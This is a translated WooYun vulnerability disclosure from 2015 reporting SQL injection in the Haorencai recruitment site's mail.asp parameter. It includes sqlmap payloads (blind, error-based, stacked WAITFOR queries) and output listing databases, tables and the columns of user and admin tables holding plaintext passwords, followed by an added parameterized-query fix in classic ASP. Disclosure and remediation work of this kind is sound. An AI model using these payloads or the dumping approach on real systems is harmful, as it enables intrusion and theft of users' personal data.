
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0141163

Title: Haorencai main site SQL injection (DBA privileges / about 130,000 user records)

Vendor: Haorencai

Author: 路人甲

Submitted: 2015-09-17 09:04

Fixed: 2015-11-03 18:32

Published: 2015-11-03 18:32

Type: SQL injection

Severity: High

Self-assessed rank: 14

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-17: details sent to the vendor, awaiting vendor handling
2015-09-19: CNCERT (National Internet Emergency Center) could not yet reach the responsible organization; details disclosed to the notifying body only
2015-09-29: details disclosed to core white hats and domain experts
2015-10-09: details disclosed to regular white hats
2015-10-19: details disclosed to intern white hats
2015-11-03: details disclosed to the public

Brief description:

SQL injection on the Haorencai main site, leaking roughly 130,000 user registration records (DBA privileges)

Detailed description:

Injection point: http://**.**.**.**/ajax/mail.asp?mail=
Testing showed DBA privileges... just ran sqlmap on it...
Found roughly 130,000 registered users
Database: haorencai
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.hrc_all_user | 130987 |
+------------------+---------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mail
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mail=' AND 5701=5701 AND 'nMdb'='nMdb
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: mail=' AND 6100=CONVERT(INT,(CHAR(58) CHAR(105) CHAR(110) CHAR(114) CHAR(58) (SELECT (CASE WHEN (6100=6100) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(122) CHAR(104) CHAR(114) CHAR(58))) AND 'moZm'='moZm
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: mail='; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: mail=' WAITFOR DELAY '0:0:5'--
---
[19:56:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[19:56:39] [INFO] fetching database names
[19:56:40] [INFO] heuristics detected web page charset 'GB2312'
[19:56:40] [INFO] the SQL query used returns 13 entries
available databases [13]:
[*] 1tian1ge
[*] hanshan-oa
[*] haorencai
[*] haorencai-20110809
[*] hsd-v2
[*] htj-oa
[*] hxa_oa
[*] korea_hospital
[*] master
[*] model
[*] msdb
[*] oa-yt
[*] tempdb
current database: 'haorencai'
current user: 'haorencai-db'
Database: haorencai
[45 tables]
+-------------------------------+
| haorencai-db.hrc_pos_view |
| haorencai-db.hrc_store_resume |
| dtproperties |
| hrc_ad_company |
| hrc_ad_personal |
| hrc_ad_phone |
| hrc_adv |
| hrc_advice |
| hrc_all_user |
| hrc_area |
| hrc_career_keyword |
| hrc_collect_position |
| hrc_collect_resume |
| hrc_com_base |
| hrc_com_pay |
| hrc_com_position |
| hrc_comment |
| hrc_document |
| hrc_job_keyword |
| hrc_link |
| hrc_manage |
| hrc_messenger |
| hrc_notice |
| hrc_per_base |
| hrc_per_cert |
| hrc_per_disp |
| hrc_per_edus |
| hrc_per_exp |
| hrc_per_lang |
| hrc_per_pay |
| hrc_per_phone |
| hrc_per_train |
| hrc_quick_base |
| hrc_quick_classify |
| hrc_report |
| hrc_resume_visited |
| hrc_send_resume |
| hsd_attractions |
| hsd_city |
| hsd_comment |
| hsd_driver |
| hsd_keyword |
| sungsin_job |
| sysconstraints |
| syssegments |
+-------------------------------+




Proof of vulnerability:

Found that user passwords are stored in plaintext, unbelievable
The administrator accounts and passwords are leaked as well...

Database: haorencai
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| dbo.hrc_messenger | 21388 |
+-------------------+---------+
[20:20:59] [INFO] retrieved: 82034
Database: haorencai
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.hrc_ad_personal | 82034 |
+---------------------+---------+
130,000 registered user records, including account names, passwords, email addresses and so on, and all of it in plaintext, unbelievable...
Database: haorencai
Table: hrc_all_user
[12 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| acceptEmail | bit |
| add_date | smalldatetime |
| autoid | int |
| from_do | varchar |
| log_hits | smallint |
| send_date | smalldatetime |
| send_date2 | smalldatetime |
| up_date | smalldatetime |
| user_id | varchar |
| user_mail | varchar |
| user_pass | varchar |
| user_type | tinyint |
+-------------+---------------+
Database: haorencai
Table: hrc_manage
[5 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| ad_name | varchar |
| ad_pass | varchar |
| ad_power | varchar |
| ad_role | int |
| id | int |
+----------+---------+
Database: haorencai
Table: hrc_manage
[9 entries]
Database: haorencai
Table: hrc_all_user
[13 entries]




Remediation:

You are the professionals...
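As an added example (not the site's own code, which the report does not show), a hardened form of the mail.asp lookup in classic ASP: the email arrives as a bound ADODB parameter instead of being concatenated into the query, and the connection uses a login limited to the tables the page needs rather than the DBA-level account the report found. The table hrc_all_user and column user_mail come from the report; the query, the connection string and the response format are assumptions.

```vbscript
<%
' Added example, not code from the Haorencai site.
' The injectable pattern behaves like (assumed, not shown in the report):
'   sql = "SELECT ... WHERE user_mail='" & Request("mail") & "'"
' Quotes, ';' and WAITFOR in the input then become SQL, which is exactly
' what the sqlmap payloads in the report exploit.
Option Explicit

Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

Function MailIsRegistered(conn, mail)
    Dim cmd, rs
    ' Reject input the column cannot hold before it reaches the database.
    If Len(mail) = 0 Or Len(mail) > 100 Then
        MailIsRegistered = False
        Exit Function
    End If
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The "?" placeholder is bound as data, so the value is never parsed as SQL.
    cmd.CommandText = "SELECT COUNT(*) FROM hrc_all_user WHERE user_mail = ?"
    cmd.Parameters.Append cmd.CreateParameter("@mail", adVarChar, adParamInput, 100, mail)
    Set rs = cmd.Execute
    MailIsRegistered = (rs.Fields(0).Value > 0)
    rs.Close
    Set rs = Nothing
    Set cmd = Nothing
End Function

Dim conn, mail
Set conn = Server.CreateObject("ADODB.Connection")
' Assumed: the connection string is stored in Application scope and uses a
' SQL login granted only SELECT on hrc_all_user, not a sysadmin/dbo account,
' so even a future injection cannot read other databases or run xp_ procedures.
conn.Open Application("ConnString")
mail = Request.QueryString("mail")
Response.ContentType = "text/plain"
If MailIsRegistered(conn, mail) Then
    Response.Write "1"
Else
    Response.Write "0"
End If
conn.Close
Set conn = Nothing
%>
```

The same parameter binding must be applied to every query in the application; a single remaining concatenated query keeps the DBA-level exposure the report describes.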

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2015-09-19 18:30

Vendor reply:

CNVD confirmed the described situation and has notified the organization operating the site through the site's publicly listed contact channels.

Latest status:

None yet